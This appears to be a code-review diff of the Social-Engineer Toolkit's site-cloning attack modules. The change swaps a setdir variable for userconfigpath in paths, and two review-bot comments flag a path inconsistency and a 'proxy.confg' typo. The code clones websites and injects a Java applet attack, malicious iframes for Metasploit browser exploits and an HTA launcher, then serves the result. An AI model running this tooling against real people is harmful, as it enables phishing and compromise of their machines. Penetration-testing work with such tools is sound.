attack_vector = line.rstrip()
|
||||
|
||||
# need to see if we created file to trigger multi attack webjacking
|
||||
multi_webjacking = "off"
|
||||
if os.path.isfile(setdir + "/multi_webjacking"):
|
||||
if os.path.isfile(userconfigpath + "multi_webjacking"):
|
||||
multi_webjacking = "on"
|
||||
|
||||
|
||||
|
@ -34,7 +34,7 @@ if check_options("IPADDR=") != 0:
|
|||
ipaddr = check_options("IPADDR=")
|
||||
|
||||
# pull URL field so we can pull favicon later on
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
match = re.search("URL=", line)
|
||||
if match:
|
||||
|
@ -48,12 +48,12 @@ for line in fileopen:
|
|||
|
||||
# move cloned site to index2.html
|
||||
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
|
||||
(setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
(userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# grab the source and write it out to the cloned directory
|
||||
fileopen = open("src/webattack/tabnabbing/source.js", "r")
|
||||
# write it to dir
|
||||
filewrite = open(setdir + "/web_clone/source.js", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/source.js", "w")
|
||||
# loop
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
|
@ -66,10 +66,10 @@ filewrite.close()
|
|||
if attack_vector == "tabnabbing":
|
||||
# grab favicon
|
||||
favicon = urllib.urlopen("%s/favicon.ico" % (URL))
|
||||
output = open(setdir + '/web_clone/favicon.ico', 'wb')
|
||||
output = open(userconfigpath + '/web_clone/favicon.ico', 'wb')
|
||||
output.write(favicon.read())
|
||||
output.close()
|
||||
filewrite1 = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite1.write(
|
||||
'<head><script type="text/javascript" src="source.js"></script></head>\n')
|
||||
filewrite1.write("<body>\n")
|
||||
|
@ -79,7 +79,7 @@ if attack_vector == "tabnabbing":
|
|||
|
||||
# define webjacking or multi webjacking here
|
||||
if attack_vector == "webjacking" or multi_webjacking == "on":
|
||||
filewrite1 = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite1.write("<script>\n")
|
||||
filewrite1.write("function a(){\n")
|
||||
filewrite1.write(
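Review bot: The favicon line still reads `open(userconfigpath + '/web_clone/favicon.ico', 'wb')` with the leading slash, while every other path in this file dropped it, so this is the one line the normalization missed. It should be `userconfigpath + 'web_clone/favicon.ico'` or, better, `os.path.join(userconfigpath, 'web_clone', 'favicon.ico')`. On POSIX the doubled slash still resolves, so this is a consistency fix rather than a behaviour change. The `if attack_vector == "webjacking" ...` block continues past the end of the last hunk.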
|
||||
|
|
|
@ -46,17 +46,17 @@ site_cloned = True
|
|||
meterpreter_iframe = "8080"
|
||||
|
||||
# make dir if needed
|
||||
if not os.path.isdir(setdir + "/web_clone/"):
|
||||
os.makedirs(setdir + "/web_clone")
|
||||
if not os.path.isdir(userconfigpath + "web_clone/"):
|
||||
os.makedirs(userconfigpath + "web_clone")
|
||||
|
||||
# if we used a proxy configuration from the set-proxy
|
||||
if os.path.isfile(setdir + "/proxy.confg"):
|
||||
if os.path.isfile(userconfigpath + "proxy.confg"):
|
||||
|
||||
fileopen = open(setdir + "/proxy.config", "r")
|
||||
fileopen = open(userconfigpath + "proxy.config", "r")
|
||||
proxy_config = fileopen.read().rstrip()
|
||||
|
||||
# just do a ls
|
||||
if not os.path.isfile(setdir + "/proxy.confg"):
|
||||
if not os.path.isfile(userconfigpath + "proxy.confg"):
|
||||
proxy_config = "ls"
|
||||
|
||||
# if counter == 0: web_port=80
|
||||
|
@ -64,7 +64,7 @@ if not os.path.isfile(setdir + "/proxy.confg"):
|
|||
webdav_meta = 0
|
||||
# see if exploit requires webdav
|
||||
try:
|
||||
fileopen = open(setdir + "/meta_config", "r")
|
||||
fileopen = open(userconfigpath + "meta_config", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("set SRVPORT 80", line)
|
||||
|
@ -77,7 +77,7 @@ except:
|
|||
|
||||
template = ""
|
||||
# Grab custom or set defined
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("TEMPLATE=", line)
|
||||
|
@ -87,8 +87,8 @@ for line in fileopen:
|
|||
|
||||
# grab attack_vector specification
|
||||
attack_vector = ""
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
|
||||
for line in fileopen:
|
||||
attack_vector = line.rstrip()
|
||||
|
||||
|
@ -108,7 +108,7 @@ update_options("APPLET_NAME=" + rand_gen_applet)
|
|||
|
||||
try:
|
||||
# open our config file that was specified in SET
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
# start loop here
|
||||
url_counter = 0
|
||||
for line in fileopen:
|
||||
|
@ -146,10 +146,10 @@ try:
|
|||
if wget == 1:
|
||||
if check_config("WGET_DEEP").lower() == "on":
|
||||
subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' %
|
||||
(proxy_config, setdir, user_agent, url), shell=True).wait()
|
||||
(proxy_config, userconfigpath, user_agent, url), shell=True).wait()
|
||||
else:
|
||||
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' %
|
||||
(proxy_config, setdir, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
(proxy_config, userconfigpath, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
else:
|
||||
# if we don't have wget installed we will use python to rip,
|
||||
|
@ -169,7 +169,7 @@ try:
|
|||
# if the site has cloned properly
|
||||
site_cloned = True
|
||||
# open file for writing
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
# write the data back from the request
|
||||
filewrite.write(html)
|
||||
# close the file
|
||||
|
@ -181,18 +181,18 @@ try:
|
|||
pass
|
||||
|
||||
# If the website did not clone properly, exit out.
|
||||
if not os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
print((
|
||||
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
|
||||
return_continue()
|
||||
site_cloned = False
|
||||
# add file to let set interactive shell know it was unsuccessful
|
||||
filewrite = open(setdir + "/cloner.failed", "w")
|
||||
filewrite = open(userconfigpath + "cloner.failed", "w")
|
||||
filewrite.write("failed")
|
||||
filewrite.close()
|
||||
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
counter = 0
|
||||
for line in fileopen:
|
||||
counter = counter + 1
|
||||
|
@ -201,27 +201,27 @@ try:
|
|||
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
|
||||
return_continue()
|
||||
site_cloned = False
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
|
||||
# add file to let set interactive shell know it was
|
||||
# unsuccessful
|
||||
filewrite = open(setdir + "/cloner.failed", "w")
|
||||
filewrite = open(userconfigpath + "cloner.failed", "w")
|
||||
filewrite.write("failed")
|
||||
filewrite.close()
|
||||
|
||||
if site_cloned == True:
|
||||
|
||||
# make a backup of the site if needed
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
setdir + "/web_clone/index.html.bak")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
userconfigpath + "web_clone/index.html.bak")
|
||||
|
||||
if site_cloned == True:
|
||||
|
||||
# if we specify UNC embedding
|
||||
if unc_embed == True:
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
index_database = fileopen.read()
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
|
||||
# Open the UNC EMBED
|
||||
fileopen4 = open("src/webattack/web_clone/unc.database", "r")
|
||||
|
@ -243,7 +243,7 @@ try:
|
|||
|
||||
# check for java flag for multi attack
|
||||
multi_java = False
|
||||
if os.path.isfile(setdir + "/multi_java"):
|
||||
if os.path.isfile(userconfigpath + "multi_java"):
|
||||
multi_java = True
|
||||
|
||||
if attack_vector == "java" or multi_java:
|
||||
|
@ -254,17 +254,17 @@ try:
|
|||
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
|
||||
# Read in newly created index.html
|
||||
time.sleep(2)
|
||||
if not os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
# trigger error that we were unable to grab the website :(
|
||||
print_error(
|
||||
"Unable to clone the website it appears. Email us to fix.")
|
||||
sys.exit()
|
||||
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
# Read add-on for java applet
|
||||
fileopen2 = open("src/webattack/web_clone/applet.database", "r")
|
||||
# Write to new file with java applet added
|
||||
filewrite = open(setdir + "/web_clone/index.html.new", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
|
||||
fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
|
||||
|
||||
# this is our cloned website
|
||||
|
@ -368,31 +368,31 @@ try:
|
|||
|
||||
# if we are using HTA attack
|
||||
if check_options("ATTACK_VECTOR") == "HTA":
|
||||
if os.path.isfile(setdir + "/Launcher.hta"):
|
||||
data1 = open(setdir + "/web_clone/index.html", "r").read()
|
||||
data2 = open(setdir + "/hta_index", "r").read()
|
||||
if os.path.isfile(userconfigpath + "Launcher.hta"):
|
||||
data1 = open(userconfigpath + "web_clone/index.html", "r").read()
|
||||
data2 = open(userconfigpath + "hta_index", "r").read()
|
||||
data3 = data1.replace("</body>", data2 + "</body>")
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite.write(data3)
|
||||
filewrite.close()
|
||||
print_status("Copying over files to Apache server...")
|
||||
apache_dir = check_config("APACHE_DIRECTORY=")
|
||||
if os.path.isdir(apache_dir + "/html"):
|
||||
apache_dir = apache_dir + "/html"
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
apache_dir + "/index.html")
|
||||
shutil.copyfile(setdir + "/Launcher.hta",
|
||||
shutil.copyfile(userconfigpath + "Launcher.hta",
|
||||
apache_dir + "/Launcher.hta")
|
||||
|
||||
print_status("Launching Metapsloit.. Please wait one.")
|
||||
subprocess.Popen("%smsfconsole -r %s/meta_config" %
|
||||
(meta_path(), setdir), shell=True).wait()
|
||||
(meta_path(), userconfigpath), shell=True).wait()
|
||||
|
||||
# selection of browser exploits
|
||||
# check to see if multiattack is in use
|
||||
multi_meta = "off"
|
||||
|
||||
if os.path.isfile(setdir + "/multi_meta"):
|
||||
if os.path.isfile(userconfigpath + "multi_meta"):
|
||||
multi_meta = "on"
|
||||
|
||||
if attack_vector == "browser" or multi_meta == "on":
|
||||
|
@ -400,19 +400,19 @@ try:
|
|||
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
|
||||
# Read in newly created index.html
|
||||
if attack_vector == "multiattack":
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
# check to see if the file is there first
|
||||
if not os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.bak"):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.bak"):
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/index.html.bak", setdir + "/web_clone/index.html.new")
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
userconfigpath + "web_clone/index.html.bak", userconfigpath + "web_clone/index.html.new")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/index.html.new", setdir + "/web_clone/index.html")
|
||||
userconfigpath + "web_clone/index.html.new", userconfigpath + "web_clone/index.html")
|
||||
time.sleep(1)
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r").readlines()
|
||||
filewrite = open(setdir + "/web_clone/index.html.new", "w")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r").readlines()
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
|
||||
counter = 0
|
||||
for line in fileopen:
|
||||
counter = 0
|
||||
|
@ -449,13 +449,13 @@ try:
|
|||
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
|
||||
|
||||
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
|
||||
if not os.path.isfile(setdir + "/web_clone/%s" % (rand_gen_applet)):
|
||||
if not os.path.isfile(userconfigpath + "web_clone/%s" % (rand_gen_applet)):
|
||||
shutil.copyfile("src/html/Signed_Update.jar.orig",
|
||||
setdir + "/web_clone/%s" % (rand_gen_applet))
|
||||
userconfigpath + "web_clone/%s" % (rand_gen_applet))
|
||||
# move index.html to our main website
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.new"):
|
||||
shutil.move(setdir + "/web_clone/index.html.new",
|
||||
setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
|
||||
shutil.move(userconfigpath + "web_clone/index.html.new",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
|
||||
# catch keyboard control-c
|
||||
except KeyboardInterrupt:
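Review bot: The proxy check tests `os.path.isfile(userconfigpath + "proxy.confg")` but the line inside it opens `userconfigpath + "proxy.config"`, so with a correctly named file the first branch is never taken and `proxy_config` always falls back to `"ls"`; both `isfile` calls should use `"proxy.config"`. This matters further down because `proxy_config` is placed at the front of the `wget` command strings that run with `shell=True`, together with `user_agent` and `url`, which are read outside these hunks. A comment at those two calls noting that all three values reach a shell unescaped would be worth adding. The enclosing `try:` starts above the later hunks and the body of `except KeyboardInterrupt:` is cut off.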
|
||||
|
|